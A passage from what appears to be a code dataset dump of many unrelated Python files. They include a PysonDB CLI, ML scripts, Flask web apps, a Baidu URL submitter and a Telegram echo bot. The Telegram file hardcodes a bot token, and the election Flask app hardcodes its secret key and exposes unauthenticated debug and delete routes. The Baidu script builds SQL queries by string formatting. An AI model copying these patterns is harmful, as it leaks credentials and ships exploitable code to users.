m:\n try:\n p_data = json.load(p)\n m_data = json.load(m)\n\n # look up primary data: a reference to the first data entry\n lp_data = list(p_data.values())[0]\n lm_data = list(m_data.values())[0]\n\n # verify that all the entries in each DB 
have the same keys\n p_keys = sorted(list(set(lp_data)))\n m_keys = sorted(list(set(lm_data)))\n\n verify_file(p_data, p_keys, p_file)\n verify_file(m_data, m_keys, m_file)\n\n except KeyError:\n print(\"Oops, the DBs do not follow the required PysonDb schema.\")\n quit()\n except IndexError:\n print(\"One of the databases is empty\")\n quit()\n\n # merge the two DB together\n\n if len(lp_data) == len(lm_data):\n if all(i in lm_data for i in lp_data):\n\n p_data.update(m_data)\n\n with open(o_file, \"w\") as f:\n print(p_data)\n json.dump(p_data, f)\n else:\n print(\"The keys of the database entries do not match\")\n else:\n print(\"The number of keys in the DB entries does not match\")\n pass\n\n\ndef totwo(primary_file: str, output_file: Optional[str] = None) -> None:\n \"\"\"Convert the old schema style DB to the new style\"\"\"\n\n if not Path(primary_file).is_file():\n print(\"The file does not exist\")\n quit()\n\n with open(primary_file, \"r\") as f:\n try:\n new_data: Dict[str, Dict[str, Any]] = {}\n file_contents = json.load(f)\n file_data = file_contents[\"data\"]\n\n for d in file_data:\n _id = d.pop(\"id\")\n new_data[_id] = d\n\n with open(output_file or \"converted_data.json\", \"w\") as f:\n json.dump(new_data, f, indent=4)\n\n except Exception:\n print(\"something went wrong\")\n quit()\n\n\ndef main() -> None:\n fire.Fire(\n {\n \"create\": create_if_not_exist,\n \"display\": display,\n \"delete\": delete,\n \"convert\": convert,\n \"converttocsv\": convert_db_to_csv,\n \"merge\": merge,\n \"totwo\": totwo\n }\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pysondb/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502408688","text":"import configparser\r\nimport requests\r\nimport datetime\r\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\r\nconfig = configparser.RawConfigParser()\r\nconfig.read('/var/www/settings.ini')\r\n\r\ngAuth = config['GIPHIER']['Token']\r\nkAuth = config['KHALKEUS']['Token']\r\naAuth = config['AARON']['Token']\r\n\r\nroom = config['CHICO']['ID']\r\nperson = 'alangford@xceptional.com'\r\n\r\nimages = {\r\n 'ayb': config['IMAGES']['AYB'],\r\n 'developer': config['IMAGES']['Developer'],\r\n 'afx': config['IMAGES']['Afx'],\r\n 'automation': config['IMAGES']['Automation'],\r\n 'hephaestus': config['IMAGES']['Hephaestus'],\r\n 'turk': config['IMAGES']['Turk'],\r\n 'matters': config['IMAGES']['Matters'],\r\n 'lunch': config['IMAGES']['Lunch'],\r\n 'garfield': config['IMAGES']['Garfield'],\r\n 'towel': config['IMAGES']['Towel']\r\n}\r\nm = MultipartEncoder({'roomId': room,\r\n 'text': 'test',\r\n 'files': (images['hephaestus'], open(images['hephaestus'], 'rb'),\r\n '')})\r\n\r\nr = requests.post('https://api.ciscospark.com/v1/messages', data=m,\r\n headers={'Authorization': 'Bearer {auth}'.format(auth=aAuth),\r\n 'Content-Type': m.content_type})\r\n\r\nprint(r.text)\r\n","sub_path":"examples/webex-post-message-to-person.py","file_name":"webex-post-message-to-person.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438064802","text":"# Escape from the Rectangle\n# Problem\n# Hansu is currently at (x, y). The bottom-left corner of the rectangle is at (0, 0), and the top-right corner is at (w, h). Write a program that finds the minimum distance from (x, y) to the boundary of the rectangle.\n\n# Input\n# The first line contains x, y, w and h. 
w and h are natural numbers less than or equal to 1,000; x is a natural number with 1 <= x <= w-1, and y is a natural number with 1 <= y <= h-1.\n\n# Output\n# Print the answer on the first line.\n\nx, y, w, h = input().split()\nx, y, w, h = int(x), int(y), int(w), int(h)\n\ndif_x = w - x if (w - x) <= x else x\ndif_y = h - y if (h - y) <= y else y\n\nprint(dif_x if dif_x <= dif_y else dif_y)\n","sub_path":"baekjoon/1085_baekjoon.py","file_name":"1085_baekjoon.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19660837","text":"import pandas as pd\n\nfrom sklearn.externals import joblib\nfrom sklearn.pipeline import Pipeline\nfrom regression_model.config import config # i need to import config while making sure it doesn't disrupt the folders\nfrom regression_model.config import logging_config\nfrom regression_model import __version__ as _version\n\n\n_logger = logging_config.get_logger()\n\n\n\ndef load_dataset(*, file_name: str) -> pd.DataFrame:\n data_path = config.DATASET_DIR / file_name\n data = pd.read_csv(filepath_or_buffer=data_path)\n return data\n\n\n\ndef save_pipeline(*, pipeline_to_persist) -> None:\n #saves the versioned model, and overwrites the previous saved models\n #This ensures that when the package is published, there is only one trained\n #model that can be called, and we know exactly how it was built.\n\n\n\n #prepare versioned save file name\n save_file_name = f\"{config.PIPELINE_SAVE_FILE}{_version}.pkl\"\n save_path = config.TRAINED_MODEL_DIR / save_file_name\n remove_old_pipelines(files_to_keep=save_file_name)\n joblib.dump(pipeline_to_persist, save_path)\n _logger.info(f\"saved pipeline: {save_file_name}\")\n\n \n\n\n\ndef load_pipeline(*, file_name: str) -> Pipeline:\n file_path = config.TRAINED_MODEL_DIR / file_name\n trained_model = joblib.load(filename=file_path)\n return trained_model\n\n\n\ndef remove_old_pipelines(*, files_to_keep) -> None:\n \n #Removes old model pipelines\n #This is to ensure that there is a simple one-to-one\n #mapping between the package version and the model version\n #to be imported and used by other applications\n\n for model_file in config.TRAINED_MODEL_DIR.iterdir():\n if model_file.name not in [files_to_keep, \"__init__.py\"]:\n model_file.unlink()","sub_path":"packages/regression_model/processing/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"653027323","text":"import tensorflow as tf \r\nfrom tensorflow.keras import layers, Model, Sequential \r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.layers import GlobalAveragePooling2D, Conv2D, MaxPooling2D, BatchNormalization, Dropout, Dense, Input, Concatenate\r\nimport sys \r\nimport numpy as np \r\nfrom tensorflow.keras.datasets import cifar100\r\n\r\n# import dataset here \r\n\r\n# x_train = np.reshape(x_train, (-1, 224, 224, 3)).astype('float32') / 255.0\r\n# x_test = np.reshape(x_test, (-1, 224, 224, 3)).astype('float32') / 255.0\r\n\r\n# y_train = tf.keras.utils.to_categorical(y_train)\r\n# y_test = tf.keras.utils.to_categorical(y_test)\r\n\r\n# inception block input-> 3x3 Maxpooling , 1x1 5x5, 1x1 3x3, 1x1\r\n\r\nclass ConvBlock(layers.Layer):\r\n\tdef __init__(self, output_channels, kernals, strides, padding):\r\n\t\tsuper(ConvBlock, self).__init__()\r\n\t\tself.conv_1 = Conv2D(output_channels, kernals, strides=strides, padding=padding)\r\n\t\tself.bn = BatchNormalization()\r\n\r\n\tdef 
call(self, inputs, training = False):\r\n\t\tx = self.conv_1(inputs, training = training)\r\n\t\tx = self.bn(x, training = training)\r\n\t\treturn tf.nn.relu(x)\r\n\r\nclass InceptionBlock(layers.Layer):\r\n\tdef __init__(self, conv1, conv3_reduce, conv3, conv5_reduce, conv5, pool_projection):\r\n\t\tsuper(InceptionBlock, self).__init__()\r\n\t\tself.conv_1 = ConvBlock(conv1, 1, padding='same', strides=1)\r\n\t\tself.conv_2 = ConvBlock(conv3, 3, padding='same', strides=1)\r\n\t\tself.conv_3 = ConvBlock(conv5, 5, padding='same', strides=1)\r\n\t\tself.conv_4 = ConvBlock(pool_projection, 1, padding='same', strides=1)\r\n\r\n\t\tself.identity_1 = ConvBlock(conv3_reduce, 1, padding='same', strides=1)\r\n\t\tself.identity_2 = ConvBlock(conv5_reduce, 1, padding='same', strides=1)\r\n\r\n\t\tself.pool = MaxPooling2D(pool_size=3, padding = 'same', strides=1)\r\n\t\tself.concat = Concatenate(axis = -1)\r\n\r\n\tdef call(self, input_tensor, training = False):\r\n\t\tbranch_1 = self.conv_1(input_tensor)\r\n\r\n\t\tid_branch_2 = self.identity_1(input_tensor)\r\n\t\tbranch_2 = self.conv_2(id_branch_2)\r\n\r\n\t\tid_branch_3 = self.identity_2(input_tensor)\r\n\t\tbranch_3 = self.conv_3(id_branch_3)\r\n\r\n\t\tbranch_4 = self.pool(input_tensor)\r\n\t\tbranch_4 = self.conv_4(branch_4)\r\n\r\n\t\treturn MaxPooling2D(pool_size=3, padding = 'same', strides=1)(self.concat([branch_1, branch_2, branch_3, branch_4]))\r\n\r\nclass InceptionModel(keras.Model):\r\n\r\n\tdef __init__(self):\r\n\t\tsuper(InceptionModel, self).__init__()\r\n\t\tself.conv1 = ConvBlock(output_channels = 32, kernals = 3, padding='same', strides=1)\r\n\t\tself.pool = MaxPooling2D(3, 2)\r\n\t\tself.conv2 = ConvBlock(output_channels = 32, kernals = 3, padding='same', strides=1)\r\n\t\tself.conv3 = ConvBlock(output_channels = 32, kernals=3, padding='same', strides=1)\r\n\r\n\t\tself.identity_1 = Conv2D(32, 1, strides=1, padding='same')\r\n\t\tself.identity_2 = Conv2D(256, 1, strides=1, padding='same')\r\n\t\tself.identity_3 = Conv2D(528, 1, strides=1, padding='same')\r\n\r\n\t\tself.block3a = InceptionBlock(64, 96, 128, 16, 32, 32)\r\n\t\tself.block3b = InceptionBlock(128, 128, 192, 32, 96, 64)\r\n\r\n\t\tself.block4a = InceptionBlock(192, 96, 208, 16, 48, 64)\r\n\t\tself.block4b = InceptionBlock(160, 112, 224, 24, 64, 64)\r\n\t\tself.block4c = InceptionBlock(128, 128, 256, 24, 64, 64)\r\n\t\tself.block4d = InceptionBlock(112, 144, 288, 32, 64, 64)\r\n\t\tself.block4e = InceptionBlock(256, 160, 320, 32, 128, 128)\r\n\r\n\t\tself.block5a = InceptionBlock(256, 160, 320, 32, 128, 128)\r\n\t\tself.block5b = InceptionBlock(384, 192, 384, 48, 128, 128)\r\n\r\n\t\tself.avgpool = GlobalAveragePooling2D()\r\n\t\tself.drop = Dropout(0.4)\r\n\t\tself.final_layer = Dense(1000, activation='softmax')\r\n\r\n\tdef call(self, input_tensor):\r\n\r\n\t\tx = self.conv1(input_tensor)\r\n\t\tx = self.conv2(x)\r\n\t\tx = self.conv3(x + self.identity_1(input_tensor))\r\n\t\tx1 = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block3a(x1)\r\n\t\tx = self.block3b(x + self.identity_2(x1))\r\n\t\tx2 = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block4a(x2)\r\n\t\tx = self.block4b(x)\r\n\t\tx = self.block4c(x)\r\n\t\tx = self.block4d(x)\r\n\t\tx = self.block4e(x + MaxPooling2D()(self.identity_3(x1)))\r\n\t\tx = MaxPooling2D(3, 2)(x)\r\n\r\n\t\tx = self.block5a(x)\r\n\t\tx = self.block5b(x)\r\n\t\tx = self.avgpool(x)\r\n\t\tx = self.drop(x)\r\n\t\toutput_layer = self.final_layer(x)\r\n\r\n\t\treturn output_layer\r\n\r\n\tdef model(self):\r\n\t\tinput_layer = Input(shape=(1024, 
1024, 3))\r\n\t\treturn Model(inputs = input_layer, outputs = self.call(input_layer))\r\n\r\nmodel = InceptionModel().model()\r\n\r\ndot_img_file = 'tmp/Inceptionv2.jpg'\r\ntf.keras.utils.plot_model(model, to_file=dot_img_file, show_shapes=True)","sub_path":"inception_net_with_skipConnections.py","file_name":"inception_net_with_skipConnections.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311303021","text":"\"\"\"\nRun with python3 precomputingEvaluator.py --path ../../DATA/weights.Siamese.best.binary_accuracy.training.hdf5\n --data ../../DATA --output June09_fixedSiamese_KaggleTestPredictions.txt > ../../DATA/June09_fixedSiamese_KaggleTestPredictions.log\n\"\"\"\nimport argparse\nimport keras\nimport h5py\nimport os\nimport keras.backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Input, Lambda\nimport numpy as np\nimport time\n\n\nK.clear_session()\n\nparser = argparse.ArgumentParser(description='Evaluate a model on the test data and prepare a Kaggle output file')\nparser.add_argument('--path', help= 'paste path to the model file')\nparser.add_argument('--data', help= 'paste path to the data folder')\nparser.add_argument('--output', help= 'name for the output file (in the data folder), defaults to KaggleTestPredictions.txt', default = 'KaggleTestPredictions.txt')\nparser.add_argument('--layer_input', help= 'name of one of the input layers', default = 'input_1')\nparser.add_argument('--layer_leg', help= 'name of the whole leg layer', default = 'sequential_1')\nparser.add_argument('--layer_dense', help= 'name of one of the dense layer that computes the final output', default = 'dense_2')\n\n\n\nargs = parser.parse_args()\n\nprint(\"Loading the model from \" + args.path)\n\n\nmodel = keras.models.load_model(args.path)\nmodel.summary()\n\nprint(\"Model loaded\")\nprint(\"------------------\")\nprint(\"Input layer name: \" + args.layer_input)\nprint(\"Leg layer name : \" + args.layer_leg)\nprint(\"Dense layer name: \" + args.layer_dense)\nprint(\"------------------\")\n\n\n#Make the pre-compute model\nprecomputeModel = Sequential()\nfor layer in model.layers:\n if layer.name == args.layer_input:\n precomputeModel.add(layer)\n print(\"Input layer added to the precompute network\")\n if layer.name == args.layer_leg:\n precomputeModel.add(layer)\n print(\"Sequential layer added to the precompute network\")\nprint(\"Precompute network input: \" + str(precomputeModel.input.shape))\nprint(\"Precompute network output: \" + str(precomputeModel.output.shape))\nprecomputeModel.summary()\nprint(\"------------------\")\n\n\n#Make the comparison model\nfor layer in model.layers:\n if layer.name == args.layer_dense:\n print(\"Comparison function input: \" + str(layer.input.shape))\n print(\"Comparison function output: \" + str(layer.output.shape))\n newOutputs = layer\n comparisonFunction = K.function([layer.input],\n [layer.output])\n print(\"Comparison function is generated\")\n print(\"------------------\")\n\n# Load the test and data\ntrainDataset = h5py.File(os.path.join(args.data, 'tr_gr_64.h5'), 'r')\ntestDataset = h5py.File(os.path.join(args.data, 'tst_gr_64.h5'), 'r')\n\ntrainX = np.array(trainDataset['x'])\ntrainY = np.array(trainDataset['y']).astype('str')\ntestX = np.array(testDataset['test_data'])\ntestFileNames = np.array(testDataset['test_labels']).astype('str')[:, 0]\n\n# Do the precomputation\nprint(\"Pre-computing the training dataset...\")\nstart = 
time.time()\ntrainXprecomp = precomputeModel.predict(x = trainX[:, :, :, np.newaxis])\nprint(\"Pre-computing the training dataset took \" + str(int((time.time()-start))) + \" seconds\")\n\nprint(\"Pre-computing the test dataset...\")\nstart = time.time()\ntestXprecomp = precomputeModel.predict(x = testX[:, :, :, np.newaxis])\nprint(\"Pre-computing the test dataset took \" + str(int((time.time()-start))) + \" seconds\")\n\n\n# Set up the output dictionary\nguesses = {}\noutputFile = open(os.path.join(args.data, args.output),'w')\nprint(\"Saving output in: \" + str(os.path.join(args.data, args.output)))\nprint(\"------------------\")\noutputFile.write(\"Image,Id\")\n\naverageProcessingTime = 0\ni = 0\n\n# Iterate over the test dataset\nfor testImage, testName in zip(testXprecomp, testFileNames):\n    i=i+1\n    start = time.time()\n    print(\"Lookin' up the whale in image \" + testName+\" [\" + str(i).zfill(5) + \"/\" + str(len(testFileNames)).zfill(5) + \"]. \", end='', flush=True)\n    # See how similar the new image is to all the images in the train set.\n    #predictions = model.predict(x = [np.repeat(testImage[ np.newaxis, :, :, np.newaxis], trainX.shape[0], axis=0), trainX[:, :, :, np.newaxis]])\n\n    predictions = comparisonFunction([np.abs(trainXprecomp - testImage[np.newaxis,:])])\n    predictions = predictions[0]\n\n    # Find the 4 most similar images (based on the SECOND output, which is how dissimilar they are; hence we are looking for the FIRST entries)\n    ranks = np.argsort(predictions[:,1])\n    sortedLabels = trainY[ranks]\n    guesses[testName] = []\n    for sortedLabel in sortedLabels: #needed to make sure there are no duplicates\n        if len(guesses[testName]) < 4 and sortedLabel not in guesses[testName]:\n            guesses[testName].append(sortedLabel)\n    print(\"Probably one of \", end='', flush=True)\n    print(guesses[testName], end='', flush=True)\n\n    # Save to the output file\n    outputFile.write(\"\\n\"+testName + \",\")\n    outputFile.write(\"new_whale\")\n    for label in guesses[testName]:\n        outputFile.write(\" \" + label)\n\n    outputFile.flush()\n\n    averageProcessingTime = (averageProcessingTime*(i-1)+ time.time() - start)/i\n    print(\". Search took \" + str(int((time.time() - start)*1000)) + \"ms. Remaining time: \" + str(int((averageProcessingTime*(len(testFileNames)-i))/60)) + \" min.\")\n\noutputFile.close()\n","sub_path":"Evaluator/precomputingEvaluator.py","file_name":"precomputingEvaluator.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"508460644","text":"from datetime import timedelta\nimport json\n\nfrom flask import Flask, request, render_template, redirect\nfrom flask_jwt import JWT, jwt_required, current_identity\nfrom sqlalchemy.exc import IntegrityError\n\nfrom models import db, randString\nimport dbproxy\n\ndef create_app():\n    app = Flask(__name__)\n    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n    app.config['SECRET_KEY'] = \"PLEASEWORK\"\n    app.config['JWT_EXPIRATION_DELTA'] = timedelta(days=7)\n    db.init_app(app)\n    return app\n\napp = create_app()\napp.app_context().push()\ndb.create_all(app=app)\n\ndef authenticate(username, password):\n    return dbproxy.authUser(username, password)\n\ndef identity(payload):\n    return dbproxy.getUser(payload['identity'])\n\njwt = JWT(app, authenticate, identity)\n\n@app.route('/', methods=['GET'])\ndef index():\n\t return app.send_static_file('index.html'), 200\n\n@app.route('/', methods=['POST'])\ndef getUserId():\n    user_data = request.get_json()\n    try:\n        user_id = dbproxy.getUserId(user_data['electionId'],\n            user_data['email'], user_data['passcode'])\n    except Exception as error:\n        return error.args\n    return json.dumps({'user_id': user_id}), 200\n\n@app.route('/create', methods=['GET'])\ndef goToCreatePage():\n    return app.send_static_file('create.html'), 200\n\n@app.route('/create', methods=['POST'])\ndef createElection():\n    data = request.get_json()\n    try:\n        dbproxy.newElection(data)\n    except Exception as error:\n        raise error\n        #return error.args\n    return 'Election created', 201\n\n@app.route('/vote', methods=['GET'])\ndef goToVotePage():\n    return app.send_static_file('vote.html'), 200\n\n@app.route('/vote/<election_id>', methods=['GET'])\n@jwt_required()\ndef loadBallot(election_id):\n    try:\n        ballot = dbproxy.getBallot(election_id, current_identity.id)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    else:\n        return json.dumps(ballot), 200\n\n@app.route('/vote/<election_id>', methods=['PUT'])\n@jwt_required()\ndef castVote(election_id):\n    ballot = request.get_json()\n    try:\n        dbproxy.castVote(election_id, current_identity.id, ballot)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    return 'Vote cast', 200\n\n@app.route('/results', methods=['GET'])\ndef goToResultsPage():\n    return app.send_static_file('results.html'), 200\n\n@app.route('/results/<election_id>', methods=['GET'])\n@jwt_required()\ndef getResults(election_id):\n    try:\n        results = dbproxy.getResults(election_id, current_identity.id)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    return json.dumps(results), 200\n\n@app.route('/edit', methods=['GET'])\ndef goToEditPage():\n    return app.send_static_file('edit.html'), 200\n\n@app.route('/edit/<election_id>', methods=['GET'])\n@jwt_required()\ndef getElectionData(election_id):\n    try:\n        election = dbproxy.getElectionData(election_id, current_identity.id)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    return json.dumps(election), 200\n\n@app.route('/edit/<election_id>', methods=['PUT'])\n@jwt_required()\ndef editElection(election_id):\n    data = request.get_json()\n    try:\n        dbproxy.updateElection(election_id, current_identity.id, data)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    return 'Election updated', 200\n\n@app.route('/remove/<election_id>', methods=['DELETE'])\ndef deleteElection(election_id):\n    try:\n        dbproxy.deleteElection(election_id)\n    except Exception as error:\n        print(error.args)\n        return error.args\n    return 'Deleted', 204\n\n@app.route('/debug')\ndef debugDB():\n    return json.dumps(dbproxy.debug()), 200\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"386078983","text":"import numpy as np\nfrom flask import Flask, request, render_template\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('Classifier.model','rb'))\n\n@app.route('/')\ndef home():\n\treturn render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n\tform_features = [float(x) for x in request.form.values()]\n\tfinal_features = [np.array(form_features)]\n\tprediction = model.predict(final_features)\n\n\tif prediction[0] == 0:\n\t\treturn render_template('index.html', prediction_text = 'This Transaction Is A Genuine Transaction')\n\telse:\n\t\treturn render_template('index.html', prediction_text = 'This Transaction Is A Fraudulent Transaction')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"140161537","text":"import subprocess\nimport json\nfrom datetime import datetime\nimport os\nimport pymysql\nimport requests\n\nconn = pymysql.connect(host = '*', \n                       database = 'baiduzz',\n                       user = '*', \n                       passwd = '*')\ncursor = conn.cursor()\n\nurlZhanZhang = '*'\n\nAPI = {'https://api.youqiantu.com/v1/social/groups/10000/threads'}#all apis\napiToUrlFormatMap = {'https://api.youqiantu.com/v1/social/groups/10000/threads':'https://www.youqiantu.com/threads/{tid}',\n                     }\n\ndef gainUrlFromDB():\n    '''\n    return a dict containing the committed urls and their commitTimes from the database\n    '''\n    cursor.execute('select url, commitTimes from urlInformation where ifCommitted = 1')\n    result = cursor.fetchall()#result would look like this : (('asdfa.com',), ('baidu.com',))\n    urls = {res[0]:res[1] for res in result}\n    return urls\n\nurlCommitted = gainUrlFromDB()#urls successfully committed from database\n\ndef gainUrlFailedFromDB():\n    '''\n    return a dict containing the failed urls and their commitTimes from the database\n    '''\n    cursor.execute('select url, commitTimes from urlInformation where ifCommitted = 0')\n    result = cursor.fetchall()#result would look like this : (('asdfa.com',), ('baidu.com',))\n    urls = {res[0] :res[1] for res in result}\n    return urls\n\nurlFailed = gainUrlFailedFromDB()\n\ndef gainUrlStatic(fileName):\n    urls = set()\n    try:\n        with open(fileName, 'r+') as f:\n            line = f.readline()\n            line = line.strip('\\n')\n            if bool(line):\n                urlList = line.split('\\n')\n                for index in range(len(urlList) ):\n                    if urlList[index] not in urlCommitted:#check if it is committed\n                        urls.add(urlList[index])\n                return urls\n    except FileNotFoundError:\n        print(fileName + ' not found')\n\n\n\ndef gainTidbyApi(api):\n    '''\n    gain all tids by api\n    api : \n    return : set\n    '''\n    api_v1 = ['https://api.youqiantu.com/v1/social/groups/10000/threads']\n    newTids = set()\n    if api in api_v1:\n        rowStart = 0\n        rowNum = 16#number of each request\n        newTids = set() #new tid\n        while True:\n            #repeat until hasMore == False is met\n            apiFormat = api + 
'?rowStart={rowStart}&rowNum={rowNum}'\n urlOfApi = apiFormat.format(rowStart = rowStart, rowNum = rowNum)\n content = requests.get(urlOfApi).text#content from the url\n contentjson = json.loads(content)#convert to json format\n threads = contentjson['body']['threads'] #all threads\n if not hasattr(threads, '__iter__'):\n print('nothing from the sverver')\n break\n for item in threads:\n tid = item['tid']#an arctile's tid\n newTids.add(tid)\n \n if not contentjson['body']['hasMore']:#if hasMore is not True, the end is met\n break\n rowStart += rowNum\n #end while\n #end if\n\n return newTids\n\n\ndef gainUrlByApi(api):\n '''\n gain new urls from api\n api : string, api's url\n return : set\n '''\n newTids = gainTidbyApi(api)\n urls = set()#new urls ,there is no dumplicate, it's set\n urlFormat = apiToUrlFormatMap.get(api, '')\n if urlFormat:\n for tid in newTids:\n url = urlFormat.format(tid = tid)\n if url not in urlCommitted:\n urls.add(url)\n \n return urls\n\ndef commit(urls):\n '''\n urls : a set containning the url need to commit\n '''\n global urlCommitted, urlFailed\n\n timeNow = datetime.strftime(datetime.utcnow(), '%Y-%m-%d') \n urlFileName = 'urlCommitFile.txt'\n logFd = open(timeNow +'-log.json', 'a+', encoding = 'utf8')#store logs\n command = '''curl -H \"Content-Type:text/plain\" --data-binary @{urlFileName} \"http://data.zz.baidu.com/urls?site=www.youqiantu.com&token=FeSfg1UzQuOfrWBU\"'''.format(urlFileName = urlFileName)\n\n for url in urls:\n\n r = requests.post(urlZhanZhang, data = url)\n result = r.text#result from the commit\n resultJson = json.loads(result)#convert to json\n successNum = resultJson.get('success', 0)\n resultJson['time'] = timeNow\n resultJson['url'] = url\n \n logFd.write(str(resultJson))\n print('commit:' + url)\n\n ifCommitted = 0\n if successNum:#commit successful \n ifCommitted = 1\n urlCommitted[url] = 1#add url committed successfully \n \n firstCommitTime = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if url in urlFailed:#we need update the lastCommitTime and committedTimes\n sql ='update urlInformation set lastCommitTime = \"{lastCommitTime}\", ifCommitted = {ifCommitted},commitTimes = {commitTimes},result = \"{result}\" where url = \"{url}\"'.format(\n url = url, ifCommitted = ifCommitted, lastCommitTime = firstCommitTime, commitTimes = urlFailed.get(url)+ 1, result = str(resultJson))\n else:\n sql = 'insert into urlInformation values (\"{url}\",{ifCommitted}, \"{firstCommitTime}\", \"{lastCommitTime}\", {commitTimes},\"{result}\")'.format(\n url = url, ifCommitted = ifCommitted, firstCommitTime = firstCommitTime, lastCommitTime = firstCommitTime, commitTimes = 1, result = str(resultJson))\n cursor.execute(sql)\n conn.commit()\n urlCommitted = gainUrlFromDB()#update url committed successfully from database\n urlFailed = gainUrlFailedFromDB()#update url committed failed from database\n #end for\n logFd.close()\n\n\ndef commitUrlFromApi():\n for api in API:\n urls = gainUrlByApi(api)\n commit(urls)\n\ndef commitUrlFromStatic():\n urlStatic = gainUrlStatic('rulStatic.txt')\n if urlStatic:\n commit(urlStatic)\n #print('commit from static')\n\ndef commitUrlFromFailed():\n urlFailed = gainUrlFailedFromDB()\n if urlFailed:\n commit(urlFailed)\n\n\ncommitUrlFromFailed()\ncommitUrlFromStatic()\ncommitUrlFromApi()","sub_path":"baidu_v1.py","file_name":"baidu_v1.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591555924","text":"import 
telebot\n\n\ntoken = '485606860:AAFC1eSP_LksyJSRHsDK0Z9b49Rt4u_YzEI'\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(content_types=['text'])\ndef check_message(message):\n\n t = message.text\n t=t[::-1]\n bot.send_message(message.chat.id, t)\n\nbot.polling(none_stop=True)\n","sub_path":"bot/this_bot.py","file_name":"this_bot.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405124460","text":"# Write a program that uses nested loops to collect data and calculate the average rainfall over a\r\n# period of years. The program should first ask for the number of years. The outer loop will\r\n# iterate once for each year. The inner loop will iterate twelve times, once for each month. Each\r\n# iteration of the inner loop will ask the user for the inches of rainfall for that month. After all\r\n# iterations, the program should display the number of months, the total inches of rainfall, and the\r\n# average rainfall per month for the entire period.\r\n\r\nyears = int(input('Enter number of years: '))\r\nmonth = 12\r\ntotal = 0\r\n\r\nfor yearNum in range(years):\r\n print('Year number ', yearNum + 1)\r\n for monthNum in range(month):\r\n print('Month ', monthNum + 1)\r\n rainfall = int(input('Rain fall: '))\r\n total += rainfall\r\n\r\ntotalMonth = years * 12\r\naverage = total / totalMonth\r\nprint(totalMonth, \" months\")\r\nprint(total, ' Inches of rainfall')\r\nprint('The average is ', average, ' inches.')","sub_path":"Pythonbasics/AverageRainfall.py","file_name":"AverageRainfall.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154475818","text":"from classification import run_classification_voting\r\nfrom constants import voting_param_grid\r\nimport pandas as pd\r\nimport joblib\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nif __name__ == \"__main__\":\r\n X_train = pd.read_pickle('data/X_train.pkl')\r\n y_train = pd.read_pickle('data/y_train.pkl')\r\n X_test = pd.read_pickle('data/X_test.pkl')\r\n y_test = pd.read_pickle('data/y_test.pkl')\r\n\r\n random_forest = joblib.load('models/best_model_random_forest.pkl')\r\n extra_trees = joblib.load('models/best_model_extra_trees.pkl')\r\n ada_boost = joblib.load('models/best_model_ada_boost.pkl')\r\n gradient_boosting = joblib.load('models/best_model_gradient_boosting.pkl')\r\n logistic_regression = joblib.load('models/best_model_logistic_regression.pkl')\r\n\r\n run_classification_voting(X_train, X_test, y_train, y_test, 'voting_classifier', voting_param_grid,\r\n random_forest, extra_trees, ada_boost, gradient_boosting, logistic_regression,\r\n 'accuracy', accuracy_score, predict_probas_or_classes='classes')\r\n","sub_path":"classifier_voting.py","file_name":"classifier_voting.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504740854","text":"import random\r\nfrom pandas import json_normalize\r\nimport json\r\n\r\n\r\ndef randomColor(labels):\r\n colors = []\r\n for item in labels:\r\n colors.append(\"%06x\" % random.randint(0, 0xFFFFFF))\r\n return colors\r\n\r\n \r\n\r\ndef getChart(data):\r\n csv = json_normalize(data[0])\r\n x = data[1]\r\n y = data[2]\r\n record, labels = list(csv[x]) , list(set(csv[y]))\r\n xtype, ytype = csv.dtypes[x], csv.dtypes[y]\r\n colors = randomColor(labels)\r\n\r\n return {\r\n 'record' : record,\r\n 
